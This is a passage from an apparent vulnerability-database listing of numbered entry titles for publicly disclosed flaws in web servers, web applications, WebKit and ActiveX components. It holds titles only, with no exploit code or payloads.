Web Server loadstatic.cgi desc Parameter XSS [65523] Accoria Web Server getenv Sample Program Query String XSS [65522] Accoria Web Server authcfg.cgi User Account Creation CSRF [65521] Accoria Web Server loadstatic.cgi name Parameter Traversal Arbitrary File Access [65520] Accoria Web Server Predictable httpmod-sessionid Cookie Session Hijack Weakness [65519] Accoria Web Server authcfg.cgi path Parameter Remote Format String [65503] Microsoft IE CImWebObj ActiveX Local Overflow DoS [65501] D-Link DI-604 Ping Tools Interface IP Field XSS [65500] D-Link DI-604 Ping Tools Interface IP Field DoS [65483] VU Web Visitor Analyst redir.asp Multiple Parameter SQL Injection Authentication Bypass [65476] LiteSpeed Web Server Script Source Code Information Disclosure [65468] Avaya CallPilot Unified Messaging NMWEBINST.NMWebInstCtrl.1 ActiveX InstallFrom() Method Arbitrary Code Execution [65448] WebKit Absolute Positioning Removal Layout Handling Use-after-free Arbitrary Code Execution [65444] Wing FTP Server Admin Interface admin_loginok.html POST Request XSS [65440] Web Application Finger Printer (WAFP) Multiple Script Insecure /tmp Handling Issue [65439] IBM WebSphere Application Server for z/OS SSL Upload Large File DoS [65438] IBM WebSphere Application Server for z/OS addNode.log Information Disclosure [65437] IBM WebSphere Application Server for z/OS SIP Logging Trace File Information Disclosure [65428] HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil.dll sprintf Function Overflow [65427] HP OpenView Network Node Manager ovwebsnmpsrv.exe Error Handling Functionality Overflow [65416] Miniweb index.php module Parameter Arbitrary File Access [65400] WebKit Geolocation::disconnectFrame Geolocation Timer Handling Document Deletion Use-after-free [65399] WebKit toAlphabetic List Marker Rendering Off-by-one [65381] CA WebScan ActiveX Multiple Unspecified Arbitrary Code Execution [65380] IgnitionSuite Web CMS Mailing List Arbitrary User Unsubscribe [65355] 360 Web Manager webpages-form-led-edit.php IDFM Parameter SQL Injection [65354] 360 Web Manager /menu/sub-menu-led-01.php IDM Parameter XSS [65342] WebKit SVG RadialGradiant Run-in Handling Use-after-free Arbitrary Code Execution [65341] WebKit SVG Document Nested use Element Memory Corruption [65340] WebKit Ordered List Insertion Handling Memory Corruption [65338] WebKit IBM1147 Character Set Text Transformation Memory Corruption [65337] WebKit RenderInline::splitInlines CSS-styled HTML Content Rendering Memory Corruption [65336] WebKit SVG Document Recursive use Element Handling Use-after-free Arbitrary Code Execution [65335] WebKit HTML Button / Menulist :first-letter Pseudo Class Element Modification User-after-free [65334] WebKit DOM Range Object Handling Use-after-free [65333] WebKit RenderLayer::updateHoverActiveState Hover Event Handling Use-after-free Code Execution [65332] WebKit Marquee Event Selection Change Handling Arbitrary Code Execution [65330] WebKit TextArea Custom Font Handling Use-after-free [65329] WebKit iframe.src JavaScript URL Multiple DOM Aliases Cross-Origin Bypass UXSS [65328] WebKit HTML Element Custom Vertical Positioning Handling Use-after-free [65327] WebKit HTML Document Fragment Handling XSS [65326] WebKit Node.normalize Method Handling Use-after-free [65325] WebKit NTLM Credential Cleartext Remote Disclosure [65323] WebKit Clipboard URL Handling Arbitrary File Disclosure [65322] WebKit FixedTableLayout::calcWidthArray HTML Table Layout Handling Memory Corruption [65321] WebKit Image Drag and Drop Operation Page Refresh Use-after-free Arbitrary Code Execution [65320] WebKit HTTP Site Redirect Referer Header Information Disclosure [65319] WebKit DOM Constructor Object Handling XSS [65318] WebKit FrameView::scheduleRelayoutOfSubtree Subtree Rendering Use-after-free [65317] WebKit ContainerNode::removeChild Use-after-free Arbitrary Code Execution [65316] WebKit CSS first-letter Pseudo-element Handling Use-after-free Arbitrary Code Execution [65315] WebKit Script Tags / Attributes Copy-Pasting XSS [65314] WebKit execCommand Method Clipboard Content Manipulation [65313] WebKit TCP Port Request Handling Information Disclosure [65312] WebKit Container Element ContentEditable Attribute Use-after-free Arbitrary Code Execution [65311] WebKit textarea Element innerHTML / outerHTML Node Properties Handling UXSS [65310] WebKit XMLTokenizer::doEnd Incorrect libxml API Usage DoS Weakness [65309] WebKit SVG Document ConditionEventListener Double-free Arbitrary Code Execution [65307] WebKit EventHandler::keyEvent Keyboard Focus Cross-Frame Keystroke Redirection [65306] WebKit Incomplete Port Blacklist Remote Information Disclosure Weakness [65305] WebKit DOCUMENT_POSITION_DISCONNECTED Attribute Handling Use-after-free Arbitrary Code Execution [65304] WebKit Form Submission HTTP Redirect Remote Information Disclosure [65303] WebKit SVG Crafted Canvas Cross-site Image Capture Disclosure [65302] WebKit SVG Document use Element Handling Uninitialized Memory Arbitrary Code Execution [65301] WebKit Local Storage / Web SQL Database Traversal Arbitrary File Creation [65300] WebKit 'SecurityOrigin::SecurityOrigin' Function Malformed URL Handling Same-Origin Policy Bypass [65299] WebKit CSS :visited Pseudo-class Handling Browsing History Disclosure [65270] Webmedia Explorer /includes/folder.class.php readme Parameter CSRF [65269] Cisco Linksys WAP54Gv3 Debug Interface Hardcoded Credentials Remote Command Execution [65120] NITRO Web Gallery index.php PictureId Parameter SQL Injection [65107] Weborf HTTP Range Header Handling Remote DoS [65103] Websense Enterprise ISAPI Filter Plug-in HTTP Via Header Access Restriction Bypass [65102] Hitachi Web Server SSL Client Certificate Revocation List Security Bypass [65101] Hitachi Web Server SSL Packet Handling DoS [65089] Horde Groupware / Horde Groupware Webmail Edition Unspecified CSRF [65053] Slooze PHP Web Photo Album slooze.php file Parameter Arbitrary Command Execution [65043] EvoCam Web Server GET Request Overflow [65039] Visitor Web Stats Module for osCommerce index.php Accept-Language HTTP Header SQL Injection [65002] D-Link DI-724P+ Admin Interface wlap.htm GET String XSS [64980] Microsoft Outlook Web Access (OWA) URI id Parameter Information Disclosure [64963] Webby Webserver GET Request Remote Overflow [64962] Iomega Home Media Network Hard Drive smbwebclient.php Remote File Access [64950] Brekeke PBX pbx/gate pbxadmin.web.PbxUserEdit Bean Admin Password Manipulation CSRF [64941] Cisco Scientific Atlanta WebSTAR DPC2100R2 goform/_aslvl Multiple CSRF [64863] eWebeditor ASP manage/ewebeditor/upload.asp style Parameter Arbitrary File Upload [64862] eWebeditor ASP admin/ewebeditor/ewebeditor.htm style Parameter Arbitrary File Upload [64861] eWebeditor ASP ewebeditor/db/ewebeditor.mdb Database Disclosure [64860] eWebeditor ASP eWebEditor/admin/login.asp URI Admin Authentication Bypass [64859] eWebeditor ASP ewebeditor/asp/browse.asp dir Parameter Traversal Arbitrary Directory Disclosure [64835] Weblinks Component for Joomla! index.php id Parameter SQL Injection [64833] Kingsoft WebShield KAVSafe.sys IOCTL Handling Memory Corruption [64832] McAfee Email Gateway Web Access admin/systemWebAdminConfig.do Direct Request Authentication Bypass [64810] Authentium Command Free Scan ActiveX (CSSWEBLib.Installer) InstallProduct1 Function Overflow [64742] IBM WebSphere Application Server (WAS) JAX-RPC WS-Security / JAX-WS Runtime WebServices Tokens Access Restriction Bypass [64741] IBM WebSphere Application Server (WAS) Multiple Component Unspecified Remote DoS [64740] IBM WebSphere Application Server (WAS) Web Container response.sendRedirect Chunked Transfer Encoding GET Request Remote DoS [64721] IBM WebSphere Application Server (WAS) Web Container Filename Handling Information Disclosure [64712] WebLOADER izle.php vid Parameter SQL Injection [64700] WebSAM DeploymentManager Packet Handling Unspecified Remote DoS [64693] Abyss Web Server Admin Password Change CSRF [64674] Free Download Manager Site Explorer Website Handling Overflow [64611] MiniWebSvr Special Character Traversal Arbitrary File Access [64579] ActivePDF WebGrabber APWebGrb.ocx GetStatus() Method Overflow [64539] Microsoft Office OCX ActiveX Controls OpenWebFile() Arbitrary Program Execution [64531] Microsoft Outlook Web Access (OWA) Path Traversal Attachment Handling Weakness [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS [64513] HiWeb Wiesbaden Web 2.0 Social Network Freunde Community System user.php id Parameter SQL Injection [64512] HiWeb Wiesbaden Live Shopping Multi Portal System index.php artikel Parameter SQL Injection [64498] HiWeb Wiesbaden Ruckwarts Auktionshaus Products cafe.php id Parameter SQL Injection [64496] HiWeb Wiesbaden Shop - Lizenzsystem - Downloadsystem index.php id Parameter SQL Injection [64479] Apple Safari WebKit WebKit.dll marquee Tag Sequence Infinite Loop Remote DoS [64457] eWebeditor upload.asp dir Parameter Traversal Arbitrary Directory Disclosure [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64324] KSES weblib.php fix_non_standard_entities Function XSS Protection Bypass [64307] Apache Tomcat Web Application Manager/Host Manager CSRF [64283] Easy File Sharing Web Server files.sdb File List Disclosure [64281] Ektron CMS400.NET workarea/blankredirect.aspx Arbitrary Web Page Redirection [64257] WebKit HTML Media Element Inside SVG Image Handling Memory Corruption [64250] IBM WebSphere Application Server (WAS) SIP Message Trace Log Local Information Disclosure [64249] IBM WebSphere Application Server (WAS) Trace Output Debugging Statement Information Disclosure [64174] Palm Pre WebOS SMS Client HTML Injection [64172] JBoss Enterprise Application Platform /web-console HTTP Request Information Disclosure [64163] Webessence CMS webessence/comment_do.php itemid Parameter SQL Injection [64162] Webessence CMS webessence/admin/media_new_do.php Arbitrary File Upload [64161] Webessence CMS webessence/oembed.php id Parameter XSS [64137] Wing FTP Server Web Client Unspecified Traversal Arbitrary File Access [64126] webMathematica MSP Script Direct Request Path Disclosure [64122] IBM WebSphere MQ Channel Process Incorrect Control Data Remote DoS [64090] Web Wiz Forums post_message_form.asp FID Parameter Arbitrary Forum Access [64084] NKInFoWeb loadorder.php id_sp Parameter SQL Injection [64076] WebAsyst Shop-Script Unspecified Script Multiple Parameter XSS [64075] WebAsyst Shop-Script Unspecified Script Multiple Parameter SQL Injection [64074] WebAsyst Shop-Script Unspecified Script sub Parameter Traversal Unspecified Issue [64006] Memorial Web Site Script show_memorial.php id Parameter SQL Injection [64002] WebKit DocumentThreadableLoader::preflightFailure Synchronous Preflight XMLHttpRequest CSRF [63979] Webmoney WMI Component for Joomla! index.php controller Parameter Directory Traversal Arbitrary File Access [63978] Cisco Small Business Video Surveillance and Security Routers Management Interface Password Exposure [63933] Cybozu Multiple Products Login Interface Access Restriction Bypass [63926] 3Com H3C S9500E / S12500 Switches Unspecified Web Portal Authentication DoS [63886] Gefest Web Home Server Multiple Unspecified Issues [63885] FreeWebshop.org cookie_lang Cookie Traversal Arbitrary File Access [63884] FreeWebshop.org fws_cust Cookie SQL Injection [63883] FreeWebshop.org Account Brute Force Weakness [63882] FreeWebshop.org fws_guest Cookie customerid Parameter Prediction Weakness [63877] Tiny Java Web Server (TJWS) snoop.jsp Path Disclosure [63876] Tiny Java Web Server (TJWS) Open Redirect [63875] Tiny Java Web Server (TJWS) Arbitrary File Access [63874] Tiny Java Web Server (TJWS) Unspecified Traversal Arbitrary Directory / File Access [63870] Webessence CMS Page Deletion CSRF [63869] Webessence CMS webessence/admin/media.php type Parameter XSS [63868] SecureSphere Web Application and Database Firewall Appended Long String Request IPS Functionality Bypass [63835] TANDBERG Video Communication Server Admin Web Console secure.php Crafted HTTP Cookie: tandberg_login= Header Authentication Bypass [63809] Cisco Secure Desktop (CSD) CSDWebInstaller ActiveX Signature Verification Arbitrary Code Execution [63798] Oracle Java Deployment Toolkit Java Web Start Argument Injection Arbitrary Program Execution [63774] Oracle Collaboration Suite User Interface Components Unspecified Remote Issue [63725] Multi Profit Websites page.php id Parameter Traversal Arbitrary File Access [63675] Web TV Component for Joomla! index.php controller Parameter Traversal Local File Inclusion [63629] WebMaid CMS template/wm025/footer.php Multiple Parameter Remote File Inclusion [63628] WebMaid CMS template/calm/top.php menu Parameter Remote File Inclusion [63627] WebMaid CMS template/calm/footer.php Multiple Parameter Remote File Inclusion [63626] WebMaid CMS template/babyweb/index.php Multiple Parameter Remote File Inclusion [63625] WebMaid CMS cArticle.php com Parameter Traversal Arbitrary File Access [63624] WebMaid CMS cGuestbook.php com Parameter Traversal Arbitrary File Access [63623] WebMaid CMS cContactus.php com Parameter Traversal Arbitrary File Access [63594] IBM WebSphere Portal Login Process Unspecified Issue [63586] webERPcustomer Component for Joomla! index.php controller Parameter Traversal Local File Inclusion [63563] Oracle iPlanet Web ServerWebDAV Implementation LOCK Request Handling Arbitrary File Access [63542] uTorrent Web UI Basic Authorization Header NULL Dereference Remote DoS [63515] VMware Server WebAccess JSON Error Message XSS [63513] VMware Multiple Products WebAccess URL Forwarding Request Origin Spoofing Weakness [63512] VMware Multiple Products WebAccess Context Data XSS [63508] OmniWeb Crafted Short Data Type Outbound TCP Connection Restriction Bypass [63506] Oracle Java SE / Java for Business Java Web Start Java Plug-in Unspecified Remote DoS [63497] Oracle Java SE / Java for Business Java Web Start Plug-in Unspecified Unauthenticated Remote Issue (2010-0087) [63496] Oracle Java SE / Java for Business Java Web Start Plug-in Unspecified Unauthenticated Remote Issue (2010-0090) [63480] IBM WebSphere Application Server (WAS) Administration Console URI XSS [63471] WebKit Node::notifyLocalNodeListsAttributeChanged Attribute Child Removal Use-after-free Arbitrary Code Execution [63467] WebKit WebCore::CSSSelector style Element '&gt [63442] KimsQ _sys/_ext/skin/_skin/default_webzine/comment.php bbs[skin] Parameter Remote File Inclusion [63369] Apple Mac OS X Wiki Server Unspecified Weblog Creation Restriction Bypass [63336] IBM WebSphere Application Server (WAS) for z/OS Admin Console Multiple Unspecified Issues [63325] Intellicom NetBiter webSCADA NetBiterConfig.exe hn Parameter Remote Overflow [63312] Webesse E-Card Extension for TYPO3 Traversal Unspecified Issue [63308] IBM WebSphere Application Server (WAS) Orb Client SSL Handshake Remote DoS [63307] IBM WebSphere Application Server (WAS) J2CConnectionFactory Object Cleartext Password Storage [63297] Miniweb index.php module Parameter Path Disclosure [63288] Open Web Analytics mw_plugin.php IP Parameter Traversal Remote File Inclusion [63282] IBM WEBi Unspecified XSS [63241] WebsiteBaker Database Backup Direct Request Information Disclosure [63195] Jokes Complete Website results.php searchingred Parameter XSS [63194] Jokes Complete Website joke.php id Parameter XSS [63193] Web Server Creator - Web Portal index.php Forum Page XSS [63192] Web Server Creator - Web Portal news/form.php path Parameter Remote File Inclusion [63191] Web Server Creator - Web Portal index.php pg Parameter Remote File Inclusion [63190] Web Server Creator - Web Portal news/include/customize.php l Parameter Traversal Arbitrary File Access [63137] Cherokee Web Server on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63130] Webmatic index.php Multiple Parameter XSS [63114] Google Chrome WebKit 'protocolIs()' Function Javascript URI Leading NULL Byte Cross-origin Policy Bypass [63111] Google Chrome WebKit WebGL Arrays JavaScript Object Integer Overflow Issues [63108] Google Chrome Web Database / STS Persistent Metadata Information Disclosure Weakness [63079] IBM DB2 Content Manager Information Integrator for Content Web Single Sign-on Unspecified Issue [63022] WebStatCaffe stat/referer.php date Parameter XSS [63021] WebStatCaffe stat/pageviewerschart.php date Parameter XSS [63020] WebStatCaffe stat/pageviewers.php date Parameter XSS [63019] WebStatCaffe stat/mostvisitpagechart.php nopagesmost Parameter XSS [63018] WebStatCaffe stat/visitorduration.php nodayshow Parameter XSS [63017] WebStatCaffe stat/mostvisitpage.php nodayshow Parameter XSS [63011] Webesse E-Card Extension for TYPO3 Unspecified Information Disclosure [63010] Webesse Image Gallery Extension for TYPO3 Unspecified SQL Injection [62996] Web Wiz Forums forum_posts.asp CSRF [62995] Web Wiz Forums edit_post_form.asp CSRF [62994] Web Wiz Forums new_topic_form.asp CSRF [62993] Web Wiz Forums new_reply_form.asp CSRF [62992] Web Wiz Forums new_poll_form.asp CSRF [62991] Web Wiz Forums new_reply_form.asp CSRF [62990] Web Wiz Forums edit_post.asp CSRF [62989] Web Wiz Forums new_post.asp CSRF [62988] Web Wiz Forums ajax_email_notify.asp CSRF [62987] Web Wiz Forums email_notify.asp CSRF [62986] Web Wiz Forums email_notify_remove.asp CSRF [62985] Web Wiz Forums email_notify_subscriptions.asp CSRF [62984] Web Wiz Forums file_upload.asp CSRF [62983] Web Wiz Forums file_delete.asp CSRF [62982] Web Wiz Forums file_manager.asp CSRF [62981] Web Wiz Forums pm_new_message_form.asp CSRF [62980] Web Wiz Forums pm_new_message.asp CSRF [62979] Web Wiz Forums includes/message_form_inc.asp CSRF [62978] Web Wiz Forums pm_inbox.asp CSRF [62977] Web Wiz Forums pm_delete_message.asp CSRF [62976] Web Wiz Forums pm_message.asp CSRF [62975] Web Wiz Forums pm_delete_buddy.asp CSRF [62974] Web Wiz Forums pm_buddy_list.asp CSRF [62973] Web Wiz Forums pm_add_buddy.asp CSRF [62969] Embedthis Appweb src/mpr/mprLib.c waitCallback() Function Remote DoS [62967] HiWeb Wiesbaden Preisschlacht index.php aid Parameter SQL Injection [62949] WebKit Image form.property Syntax Handling Use-after-free Arbitrary Code Execution [62948] WebKit WebCore::RenderBlock CSS run-in Property Use-after-free Issue [62947] WebKit HTMLInputElement::parseMappedAttribute Cached Page Navigation Use-after-free Arbitrary Code Execution [62943] WebKit HTMLParser::handleResidualStyleCloseTagAcrossBlocks Misnested Residual Style Tags Handling Use-after-free Issue [62942] WebKit RenderText::positionLineBox Text Box Removal Use-after-free Arbitrary Code Execution [62941] WebKit window.close() XML Document Parsing Use-after-free Arbitrary Code Execution [62940] WebKit FrameLoader::requestObject Object Element Style Change Use-after-free Arbitrary Code Execution [62939] WebKit CSSParser::parseFontFaceSrc CSS Parser 'format()' Method Invalid Argument Handling Arbitrary Code Execution [62902] Eros Webkatalog start.php id Parameter SQL Injection [62901] IBM ENOVIA SmarTeam WebEditor/Authentication/LoginPage.aspx errMsg Parameter XSS [62854] DWebPro start file Parameter Arbitrary Program Execution [62836] Perforce P4Web Client Workspace Unspecified Traversal Arbitrary File Creation [62747] Xerver HTTP Server Management Interface Non-numeric Port Assignment Remote DoS [62742] CA SiteMinder WebWorks Help wwhelp/wwhimpl/common/html/bookmark.htm Unspecified Parameter XSS [62741] CA SiteMinder WebWorks Help wwhelp/wwhimpl/common/scripts/switch.js Unspecified Parameter XSS [62740] CA SiteMinder WebWorks Help wwhelp/wwhimpl/common/html/frameset.htm Unspecified Parameter XSS [62739] CA SiteMinder WebWorks Help wwhelp/wwhimpl/api.htm Unspecified Parameter XSS [62738] CA SiteMinder WebWorks Help wwhelp_entry.html Unspecified Parameter XSS [62735] CSS Web Installer CSSWEBLib.Installer ActiveX Multiple Method Overflow [62724] Drupal Core Locale Module Languages Interface Multiple Parameter XSS [62678] SAP GUI (sapgui) EAI WebViewer3D ActiveX (webviewer3d.dll) Multiple Method Domain Information Overflow [62677] SAP GUI (sapgui) EAI WebViewer3D ActiveX (webviewer3d.dll) Multiple Method File Path Overflow [62643] Mereo Web Server Arbitrary File Content Disclosure [62612] IBM Lotus Domino Web Access ActiveX Unspecified Overflow [62584] WebAdministrator Lite CMS download.php s Parameter SQL Injection [62581] WebsiteBaker framework/class.wb.php print_error() Function Security Bypass [62525] Webee Comments Component for Joomla! Multiple BBCode Tags XSS [62514] IBM WebSphere Portal Portlet Palette Search Field XSS [62462] WebKit GIF Image Decoder Allocation Failure Memory Corruption [62459] Cisco Collaboration Server (CCS) webline/html/admin/wcs/LoginPage.jhtml dest Parameter XSS [62449] LiteSpeed Web Server Admin User Creation CSRF [62430] Cisco ASA 5500 Series WebVPN Malformed DTLS Message Remote DoS [62428] Mozilla Multiple Browsers Web Worker Array Handling Heap Corruption [62375] Palm Pre WebOS Mail Handling Unspecified Remote File Access [62374] Palm Pre WebOS Crafted Web Page LunaSysMgr Process DoS [62368] Palm Pre WebOS Calendar Application Event/Title Field XSS [62367] Palm Pre WebOS Email Notification System FROM Field XSS [62366] WebCalendar Admin Password Change Request CSRF [62355] SAP NetWeaver WebDynpro Runtime Unspecified XSS [62351] Portrait Campaign Manager webresource.axd Multiple Parameter XSS [62338] NetAdvantage WebHtmlEditor Component InitialDirectory Parameter Traversal Directory Access [62337] Dillo Web Browser Cookie Access Restriction Weakness Information Disclosure [62334] Webee Comments Component for Joomla! index2.php articleId SQL Injection [62323] gnome-screensaver gnome-session D-Bus Interface Screen Locking Bypass [62317] WebKit ruby Tag Handling Invalid Type Casting Issue [62313] Google Chrome WebKit WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp window.open Method Same Origin Policy Bypass [62308] WebKit XMLHttpRequests Directory Listing Information Disclosure [62307] WebKit CSS Stylesheet Cross-origin Loading Information Disclosure [62306] Google Chrome WebKit Mouse-click Event Handling Pop-up Blocker Restriction Bypass Weakness [62293] Palm Pre WebOS Application Usage Remote Information Disclosure [62290] Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access [62286] Cisco IronPort Encryption Appliance WebSafe Servlet Unspecified Arbitrary File Access [62285] Cisco IronPort Encryption Appliance Admin Interface Unspecified Arbitrary File Access [62246] Microsoft Data Analyzer ActiveX Web Page Handling Unspecified Arbitrary Code Execution [62234] Sun ONE Web Server iPlanet Log Analyzer Crafted DNS Response Inverse Lookup Log Corruption XSS [62233] Sun ONE Web Server Crafted DNS Response format= Substring Log-preview Functionality Weakness [62232] Sun ONE Web Server Logging Format Weakness Crafted DNS Response IP Address Spoofing [62228] WebTrends Crafted Client Domain Name Inverse Lookup Log Corruption XSS [62226] WebLogExpert Crafted Client Domain Name Inverse Lookup Log Corruption XSS [62225] WebExpert User-Agent HTTP Header XSS [62223] IBM WebSphere Commerce Cryptographic Key Weakness Unspecified Issue [62222] IBM WebSphere Commerce Database Encryption Weakness Local Information Disclosure [62212] Gefest Web Home Server Unspecified Traversal Arbitrary File Access [62203] SAP BusinessObjects BusinessProcessBI/axis2-web/HappyAxis.jsp Information Disclosure [62202] SAP BusinessObjects dswsbobje/axis2-web/HappyAxis.jsp Information Disclosure [62200] SAP BusinessObjects PerformanceManagement/jsp/viewWebiReportHeader.jsp sEntry Parameter XSS [62154] IBM WebSphere Service Registry and Repository (WSRR) Property Query Unspecified Remote Data Access [62140] IBM WebSphere Application Server (WAS) Single Sign-on Requires SSL Function Weakness [62104] Roundcube Webmail E-mail Message DNS Prefetching Weakness [62099] WebCalendar Event Deletion CSRF [62098] WebCalendar week.php URI XSS [62097] WebCalendar month.php URI XSS [62096] WebCalendar day.php URI XSS [62095] WebCalendar users.php tab Parameter XSS [62076] ViewVC Query Interface query.py Unsupported Root Authorizer Remote Access Restriction Bypass [62033] Oracle WebLogic Server Node Manager (beasvc.exe) Access Restriction Bypass [61983] SUSE Linux postfix Network Interface Remote Access Restriction Bypass [61980] Sun Java System Web Server Authorization: Digest HTTP Header Remote Overflow [61979] Sun Java System Web Server WebDAV Implementation PROPFIND Request Remote Format String [61978] Sun Java System Web Server Admin Server HTTP Request Method Token Weakness Remote DoS [61974] Enano CMS includes/comment.php Comment Submission Interface SQL Injection [61953] IBM DataPower XS40 / QLOGIC Interface Crafted ICMP Packet Remote DoS [61937] HP Web Jetadmin SQL Server Connection Multiple Unspecified Issues [61929] IBM WebSphere Application Server (WAS) TLS Renegotiation Handshakes MiTM Plaintext Data Injection [61917] XEROX WorkCentre Multiple Products Web Server Unspecified Authentication Bypass [61890] VP-ASP Shopping Cart Unspecified Script webess Parameter SQL Injection [61888] Zeus Web Server Unspecified XSS [61887] Zeus Web Server DNS Request Transaction ID Spoofing Weakness [61873] Block Class Module for Drupal Configuration Interface Class Field XSS [61872] Recent Comments Module for Drupal Custom Block Title Interface XSS [61871] Redatam+SP WebServer cgibin/RpWebEngine.exe BASE Parameter Error Message Path Disclosure [61870] Redatam+SP WebServer cgibin/RpWebEngine.exe/PortalAction BASE Parameter XSS [61852] Sun Java System Web Server TRACE Request Handling Overflow [61851] Sun Java System Web Server webservd OPTIONS Request Handling Overflow [61843] SAP Web Application Server (WebAS) Integrated ITS Unspecified Remote Overflow [61807] PhPepperShop Webshop shop/USER_ARTIKEL_HANDLING_AUFRUF.php darstellen Parameter XSS [61792] WebKit Stylesheet href Property Redirected Target URL Information Disclosure Weakness [61777] Cherokee Web Server header.c HTTP Request Escape Sequence Terminal Command Injection [61774] WEBrick HTTP Request Escape Sequence Terminal Command Injection [61765] Jetty WebApp JSP Snoop Page URI PATH_INFO Parameter XSS [61722] Oracle BEA WebLogic Server Servlet Container Package Unspecified Remote DoS (2010-0074) [61721] Oracle BEA WebLogic Server Servlet Container Package Unspecified Remote DoS (2010-0078) [61720] Oracle BEA WebLogic Server Web Services Unspecified Remote Issue [61719] Oracle BEA WebLogic Server Web Services Unspecified Remote Information Disclosure [61718] IBM WebSphere DataPower TLS Renegotiation Handshakes MiTM Plaintext Data Injection [61711] IBM Lotus Web Content Management Login Page Unspecified XSS [61699] Zeus Web Server SSLv2 Support Client Hello Message Handling Overflow [61650] Sun Java System Web Server on Linux Crafted Memory Address Request Remote Code Execution [61649] Sun Java System Web Server on Linux Crafted Data Remote Memory Location Disclosure [61630] WebCalenderC3 Unspecified Traversal Arbitrary File Access [61629] WebCalenderC3 Unspecified XSS [61624] Cherokee Web Server URI MS-DOS Reserved Word Remote DoS [61554] WebLeague Admin/index.php Multiple Parameter SQL Injection Authentication Bypass [61553] WebLeague profile.php name Parameter SQL Injection [61550] Survey Pro Module for Miniweb index.php URI XSS [61549] Survey Pro Module for Miniweb index.php campaign_id Parameter SQL Injection [61539] Cacti Admin Interface Arbitrary Remote Command Execution [61515] LineWeb Multiple Admin Script Direct Request Arbitrary File Manipulation [61514] LineWeb index.php op Parameter Traversal Local File Inclusion [61513] LineWeb admin/index.php op Parameter Traversal Local File Inclusion [61476] Webace CMS pfNewsDetail.php NewsId Parameter SQL Injection [61447] CARTwebERP Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access [61414] eWebquiz quiztakers.asp QuizID Parameter SQL Injection [61413] eWebquiz importquestions.asp QuizID Parameter SQL Injection [61412] eWebquiz questions.asp QuizID Parameter SQL Injection [61388] Esinti Web Design Gold Defter data/defter.mdb Direct Request Database Disclosure [61362] Vsftpd Webmin Module Unspecified Issues [61361] Proverbs Web Calendar calendar.php year Parameter XSS [61360] Proverbs Web Calendar calendar.php month Parameter SQL Injection [61337] SQL-Ledger Admin Interface Default Configuration Authentication Weakness [61308] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/common/html/bookmark.htm XSS [61307] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/common/scripts/switch.js XSS [61306] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/common/html/frameset.htm XSS [61305] VMware vCenter Lab Manager WebWorks Help Page wwhelp/wwhimpl/api.htm XSS [61304] Horde Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS [61303] Horde Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS [61301] Kolab Server Web Client Unspecified Image Upload [61266] webMathematica webMathematica/MSP/ URI XSS [61239] Social Web CMS User Profile Friends List Manipulation CSRF [61238] Social Web CMS index.php category Parameter XSS [61216] OmniWeb mailto: HREF Link Handling Overflow [61169] web2ldap StartTLS Bind Operation Unspecified Issue [61168] web2ldap Invalid Command Escaping Unspecified Issue [61167] web2ldap Unauthenticated Unspecified Arbitrary Site Redirect [61166] web2ldap Unspecified Error Message XSS [61165] web2ldap IOError Exception Error Message Path Disclosure [61164] web2ldap Modify Lists Attribute Display XSS [61163] web2ldap Referral Handler Error Message XSS [61162] web2ldap SSL Security Level / Certificate Display Unspecified Weakness [61161] web2ldap LDAPSession Instance ldapsession.LDAPSession.bind() Function Cache Handling Weakness [61160] web2ldap Internal URL Redirector Page Redirect Credential Disclosure [61159] web2ldap Unspecified XSS [61158] web2ldap ldap-client-cgi FORM Tag METHOD-parameter Unspecified Issue [61134] IBM Rational ClearQuest CQWeb Unspecified Password Disclosure [61132] Cisco ASA WebVPN Bookmark URLs ROT13 Encoding Weakness Internal Resource Access [61131] Oracle WebLogic Admin Console Default Credentials [61130] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2880) [61129] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2879) [61128] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2878) [61127] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2877) [61126] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2876) [61125] Cisco WebEx WRF Player WRF File Handling Unspecified Overflow (CVE-2009-2875) [61049] VMware vCenter Lab Manager WebWorks Help Page wwhelp_entry.html XSS [61043] Horde Administration Interface admin/phpshell.php PATH_INFO Parameter XSS [61029] Omniweb International Domain Name (IDN) Punycode Encoded Domain Name Spoofing [61020] Webmatic Unspecified SQL Injection [61019] Webmatic Unspecified XSS [60945] Circumference WebAuth Secret Token Truncation Weakness [60932] HP OpenView Network Node Manager (OV NNM) ovwebsnmpsrv.exe CGI sel Parameter Remote Overflow [60929] HP OpenView Network Node Manager (OV NNM) OvWebHelp.exe CGI Topic Parameter Remote Overflow [60928] HP OpenView Network Node Manager (OV NNM) webappmon.exe CGI Host Header Handling Remote Overflow [60899] JBoss Web Console createThresholdMonitor.jsp Multiple Parameter XSS [60898] JBoss Web Console createSnapshot.jsp Multiple Parameter XSS [60884] Symantec Multiple Products VRTSweb Component Crafted Request Arbitrary Code Execution [60883] Webmin / Usermin Unspecified XSS [60882] Kiwi Syslog Server Cassini Web Server Explorer New Application Registration Information Disclosure [60881] Kiwi Syslog Server Web Access Login Username Enumeration [60869] IBM WebSphere Application Server (WAS) Communications Enabled Applications (CEA) Feature Pack Session Identifier Prediction Weakness [60846] KR-Web adm/krgourl.php DOCUMENT_ROOT Parameter Remote File Inclusion [60817] Moodle mnet/lib.php MNET Interface Access Restriction Weakness MNET Function Execution [60806] IBM InfoSphere Information Server Web Console Unspecified XSS [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection [60670] HP Operations Manager ovwebusr Default Password [60634] IBM WebSphere Portal XMLAccess Component Work Directory Unspecified Issue [60633] IBM WebSphere Portal Collaboration Component People Picker Tag XSS [60567] RoundCube Webmail Arbitrary Email Send Unspecified CSRF [60524] Avaya 